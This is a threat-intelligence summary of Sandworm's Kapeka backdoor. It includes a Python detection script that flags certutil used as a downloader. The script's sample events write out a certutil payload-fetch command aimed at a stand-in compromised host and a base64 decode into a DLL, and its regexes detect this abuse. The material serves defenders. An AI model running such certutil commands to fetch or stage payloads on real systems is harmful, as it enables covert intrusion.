TLDR: Russian APT Deploys New ‘Kapeka’ Backdoor in Eastern European Attacks
Key Points:
- A new backdoor called Kapeka has been observed in cyber attacks targeting Eastern Europe since mid-2022.
- Attributed to the Russia-linked APT group Sandworm, Kapeka is a flexible backdoor with functionalities for data theft, destructive attacks, and remote access.
A previously undocumented backdoor named Kapeka has been sporadically used in cyber attacks targeting Eastern European countries such as Estonia and Ukraine since mid-2022. The malware, attributed to the Russia-linked advanced persistent threat (APT) group known as Sandworm, is a flexible backdoor that serves as an early-stage toolkit for attackers while providing long-term access to compromised systems.
Kapeka consists of a dropper that launches the backdoor component on the infected host, establishes persistence so the backdoor survives reboots, and then removes itself. Microsoft tracks the same malware as KnuckleTouch and has linked it to campaigns that distributed ransomware, stole credentials, carried out destructive attacks, and gave the operators remote access to infected devices.
The backdoor itself is a Windows DLL written in C++ with an embedded command-and-control (C2) configuration that tells it which attacker-controlled server to contact. It can read and write files, launch payloads, execute commands, and update or uninstall itself. The dropper is fetched from compromised websites with certutil, a legitimate signed Windows utility, a living-off-the-land technique that lets the download blend in with ordinary administrative activity rather than standing out as a foreign downloader.
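Because certutil is a signed system binary, the download step leaves no unusual file on disk, but it does leave a process-creation record. The following is an added example, not code from the original report or from any vendor tooling, showing the detection logic a SOC would run over process-creation telemetry (Sysmon Event ID 1 or Windows 4688 style fields) to surface certutil being used as a downloader. The sample events, the `example-compromised.test` host name and the file paths are constructed for illustration; the `-urlcache`, `-decode` and `-encode` switches are certutil's real, documented options.

```python
import re
from typing import Iterable, Optional

# Matches an http/https/ftp URL anywhere in a command line.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

# certutil accepts switches with either '-' or '/'. -urlcache fetches (or lists)
# URL cache entries, -decode/-encode convert between base64 text and binary,
# both commonly abused to bring a payload onto a host with a signed binary.
FLAG_RE = re.compile(r"(?<![\w\\])[-/](urlcache|decode|encode)\b", re.IGNORECASE)


def is_certutil(event: dict) -> bool:
    """True when the executing image is certutil.exe, regardless of directory or case."""
    image = event.get("Image", "")
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "certutil.exe"


def classify_certutil(event: dict) -> Optional[dict]:
    """Return a finding for suspicious certutil usage, or None for benign use.

    Priority order: a URL on the command line is the strongest signal (a fetch
    from a remote host), base64 decode/encode is next, and -urlcache without a
    URL (e.g. listing or clearing the cache) is recorded at low severity so an
    analyst can still correlate it with a preceding fetch.
    """
    if not is_certutil(event):
        return None
    cmd = event.get("CommandLine", "")
    flags = {m.group(1).lower() for m in FLAG_RE.finditer(cmd)}
    urls = URL_RE.findall(cmd)
    base = {"command": cmd, "parent": event.get("ParentImage", "")}
    if urls:
        return {"reason": "remote_fetch", "severity": "high", "urls": urls, **base}
    if "decode" in flags or "encode" in flags:
        return {"reason": "base64_transform", "severity": "medium", "urls": [], **base}
    if "urlcache" in flags:
        return {"reason": "urlcache_no_url", "severity": "low", "urls": [], **base}
    return None


def scan_events(events: Iterable[dict]) -> list:
    """Run the classifier over a stream of process-creation events and keep the hits."""
    return [f for f in (classify_certutil(e) for e in events) if f is not None]


# Constructed sample telemetry (not real logs): one downloader-style fetch, one
# benign certificate check, one base64 decode, a non-certutil process with a URL,
# and a cache listing with no URL.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example-compromised.test/update.bin C:\Users\Public\update.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\certs\server.cer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\blob.txt C:\Users\Public\stage.dll",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe http://intranet.test/readme.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache *",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['reason']}: {finding['command']}")
```

In production this runs as a rule in the SIEM rather than a script, and the `parent` field is what separates a rare but legitimate administrator invocation from one spawned by a script host or an Office process; the URL finding is the one worth alerting on immediately, since a signed binary fetching a file from an external web server is exactly the step described above.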
Kapeka shares connections with other malware families associated with Sandworm, such as GreyEnergy and Prestige, suggesting its evolution from previous tools used by the threat actor group. The malware’s victimology, infrequent sightings, and level of sophistication indicate APT-level activity likely of Russian origin.
In conclusion, Kapeka shows that Sandworm continues to build new tooling rather than relying only on known implants, so defenders in the region should watch for the behaviours described here, such as signed system utilities fetching files from web servers and newly created persistence, and not only for published indicators.